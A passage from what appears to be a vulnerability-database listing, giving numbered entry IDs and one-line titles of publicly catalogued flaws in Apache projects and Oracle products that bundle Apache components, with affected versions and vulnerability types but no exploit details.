11988| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
11989| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
11990| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
11991| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
11992| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
11993| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
11994| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
11995| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
11996| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
11997| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
11998| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
11999| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
12000| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
12001| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
12002| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
12003| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
12004| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
12005| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
12006| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
12007| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
12008| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
12009| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
12010| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
12011| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
12012| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
12013| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
12014| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
12015| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
12016| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
12017| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
12018| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
12019| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
12020| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
12021| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
12022| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
12023| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
12024| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
12025| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
12026| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
12027| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
12028| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
12029| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
12030| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
12031| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
12032| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
12033| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
12034| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
12035| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
12036| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
12037| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
12038| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
12039| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
12040| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
12041| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
12042| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
12043| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
12044| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
12045| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
12046| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
12047| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12048| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
12049| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
12050| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
12051| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
12052| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
12053| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
12054| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
12055| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
12056| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
12057| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
12058| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
12059| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
12060| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
12061| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
12062| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
12063| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
12064| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
12065| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
12066| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
12067| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
12068| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
12069| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
12070| [136370] Apache Fineract up to 1.2.x sql injection
12071| [136369] Apache Fineract up to 1.2.x sql injection
12072| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
12073| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
12074| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
12075| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
12076| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
12077| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
12078| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
12079| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
12080| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
12081| [134416] Apache Sanselan 0.97-incubator Loop denial of service
12082| [134415] Apache Sanselan 0.97-incubator Hang denial of service
12083| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
12084| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
12085| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
12086| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
12087| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
12088| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
12089| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
12090| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
12091| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
12092| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
12093| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
12094| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
12095| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
12096| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
12097| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
12098| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
12099| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
12100| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
12101| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
12102| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
12103| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
12104| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
12105| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
12106| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
12107| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
12108| [131859] Apache Hadoop up to 2.9.1 privilege escalation
12109| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
12110| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
12111| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
12112| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
12113| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
12114| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
12115| [130629] Apache Guacamole Cookie Flag weak encryption
12116| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
12117| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
12118| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
12119| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
12120| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
12121| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
12122| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
12123| [130123] Apache Airflow up to 1.8.2 information disclosure
12124| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
12125| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
12126| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
12127| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
12128| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12129| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12130| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
12131| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
12132| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
12133| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
12134| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
12135| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
12136| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
12137| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
12138| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
12139| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
12140| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
12141| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
12142| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12143| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
12144| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
12145| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
12146| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
12147| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
12148| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
12149| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
12150| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
12151| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
12152| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
12153| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
12154| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
12155| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
12156| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
12157| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
12158| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
12159| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
12160| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
12161| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
12162| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
12163| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
12164| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
12165| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
12166| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
12167| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
12168| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
12169| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
12170| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
12171| [127007] Apache Spark Request Code Execution
12172| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
12173| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
12174| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
12175| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
12176| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
12177| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
12178| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
12179| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
12180| [126346] Apache Tomcat Path privilege escalation
12181| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
12182| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
12183| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
12184| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
12185| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
12186| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
12187| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
12188| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
12189| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
12190| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
12191| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
12192| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
12193| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
12194| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
12195| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
12196| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
12197| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
12198| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
12199| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
12200| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
12201| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
12202| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
12203| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
12204| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
12205| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
12206| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
12207| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
12208| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
12209| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
12210| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
12211| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
12212| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
12213| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
12214| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
12215| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
12216| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
12217| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
12218| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
12219| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
12220| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
12221| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
12222| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
12223| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
12224| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
12225| [123197] Apache Sentry up to 2.0.0 privilege escalation
12226| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
12227| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
12228| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
12229| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
12230| [122800] Apache Spark 1.3.0 REST API weak authentication
12231| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
12232| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
12233| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
12234| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
12235| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
12236| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
12237| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
12238| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
12239| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
12240| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
12241| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
12242| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
12243| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
12244| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
12245| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
12246| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
12247| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
12248| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
12249| [121354] Apache CouchDB HTTP API Code Execution
12250| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
12251| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
12252| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
12253| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
12254| [120168] Apache CXF weak authentication
12255| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
12256| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
12257| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
12258| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
12259| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
12260| [119306] Apache MXNet Network Interface privilege escalation
12261| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
12262| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
12263| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
12264| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
12265| [118143] Apache NiFi activemq-client Library Deserialization denial of service
12266| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
12267| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
12268| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
12269| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
12270| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
12271| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
12272| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
12273| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
12274| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
12275| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
12276| [117115] Apache Tika up to 1.17 tika-server command injection
12277| [116929] Apache Fineract getReportType Parameter privilege escalation
12278| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
12279| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
12280| [116926] Apache Fineract REST Parameter privilege escalation
12281| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
12282| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
12283| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
12284| [115883] Apache Hive up to 2.3.2 privilege escalation
12285| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
12286| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
12287| [115518] Apache Ignite 2.3 Deserialization privilege escalation
12288| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
12289| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
12290| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
12291| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
12292| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
12293| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
12294| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
12295| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
12296| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
12297| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
12298| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
12299| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
12300| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
12301| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
12302| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
12303| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
12304| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
12305| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
12306| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
12307| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
12308| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
12309| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
12310| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
12311| [113895] Apache Geode up to 1.3.x Code Execution
12312| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
12313| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
12314| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
12315| [113747] Apache Tomcat Servlets privilege escalation
12316| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
12317| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
12318| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
12319| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
12320| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
12321| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
12322| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
12323| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
12324| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
